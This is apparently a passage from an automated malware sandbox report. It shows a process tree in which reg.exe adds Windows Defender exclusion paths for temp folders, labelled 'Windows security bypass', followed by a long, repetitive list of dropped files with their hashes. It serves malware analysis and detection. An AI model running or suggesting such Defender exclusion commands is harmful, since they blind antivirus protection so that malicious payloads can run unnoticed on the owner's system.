C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\grMXAHIUMHIHAuvw" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1624
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1340
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5bd35df49cacc0d3f9c3db5d688438580
SHA1364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA5127f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901
-
Filesize
6.3MB
MD5bd35df49cacc0d3f9c3db5d688438580
SHA1364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA5127f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59c77d8d247582bde507e5eda19a4c85b
SHA115d02d823170cd49647e30d7c2ed0750d02eda6a
SHA256b44cdeea23015a0120aa1880f81f24fc64edcd841d49dbe112739e3b6d52c482
SHA51252acb02f85ae54e28905aab40981f18d1948d3ba8467bf4d39c9963414b7547529abf7753cb31fabeb8c8126f6ceea4eb4fde4f3a3838dd7284b381cf21dcba1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e4e81e7383459810e5f9e82ddcca41bc
SHA1b000cad6a086d689094a8c868399e1cff283b5e5
SHA2566ea7933650b6818d2994dcd12103b1e908b8bd9c60f9add973ad1cdc8e31deb7
SHA5125847469a675bd63818ca9cc29690aac80b3324d86070b8cd48b79bc72dfccb3206c3285da9166b76958d0ed0f931e028bcea319d6c622f95787fcd50c2a58b6c
-
Filesize
8KB
MD50b1e51c9a8b95b9209826b2be06ff26f
SHA1986bea32d6107f964de3a5f8525ee4cb522780b8
SHA25680a1b9947818cfece8b24e8458bff8f3a85feb235849315f21be745c2d24cf5b
SHA5124d0600c981e1cce2479cd6e56025bae003a817fd0f5bda20a9f93b0846d94b269dbd319809ac125e71fdd116ff7ad576ddc7e6d5c197a0c4b3124297c2029e76
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD5bd35df49cacc0d3f9c3db5d688438580
SHA1364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA5127f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901
-
Filesize
6.3MB
MD5bd35df49cacc0d3f9c3db5d688438580
SHA1364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA5127f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901
-
Filesize
6.3MB
MD5bd35df49cacc0d3f9c3db5d688438580
SHA1364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA5127f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901
-
Filesize
6.3MB
MD5bd35df49cacc0d3f9c3db5d688438580
SHA1364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA5127f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180
-
Filesize
6.8MB
MD56772e7af138504e782c6e77d79080a21
SHA1f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA2564ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA51207b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180